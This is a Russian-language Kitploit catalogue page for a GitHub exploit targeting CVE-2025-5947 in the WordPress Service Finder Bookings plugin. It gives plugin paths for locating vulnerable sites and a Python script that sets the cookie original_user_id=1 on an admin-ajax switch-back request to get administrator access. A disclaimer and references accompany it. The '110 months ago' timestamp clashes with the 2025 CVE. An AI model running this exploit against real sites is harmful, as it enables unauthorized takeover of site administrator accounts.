Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5947_Exploit — Мини-эксплойт для плагина Service Finder -Bookings для WP | Kitploit
Инструменты/GitHubGitHub/m4rgs/cve-2025-5947_exploit
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

Мини-эксплойт для плагина Service Finder -Bookings для WP

Репозиторий
110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔍 Эксплойт плагина WordPress — Service Finder (sf-booking)

Обзор

Плагин Service Finder — это система бронирования и управления услугами для WordPress.
Из-за его популярности и сложности в некоторых версиях были обнаружены проблемы безопасности, связанные с неаутентифицированными AJAX-эндпоинтами или некорректным контролем доступа.

В этом README объясняется, как исследователи могут безопасно идентифицировать установки и следовать этическим практикам (dbr krk).


Уязвимые WP-дорки

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


Порядок действий при эксплуатации

⚠️ Отказ от ответственности:
Эти поиски предназначены только для образовательных и исследовательских целей. Не предпринимайте несанкционированный доступ или эксплуатацию.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ УЯЗВИМОСТЬ! Перенаправление в админ-панель как АДМИНИСТРАТОР
  • 400-499: ⚠️ Ошибка клиента — запрос был недействительным или неавторизованным, не уязвимость

Ссылки

  • База данных плагинов WPScan — https://wpscan.com/plugins/
  • Национальная база данных уязвимостей (NVD) — https://nvd.nist.gov/
  • OWASP — методы Google Dorking / разведки
  • Рекомендации по раскрытию информации HackerOne — https://www.hackerone.com/disclosure-guidelines

Автор

Taha Mounir


Скачать инструмент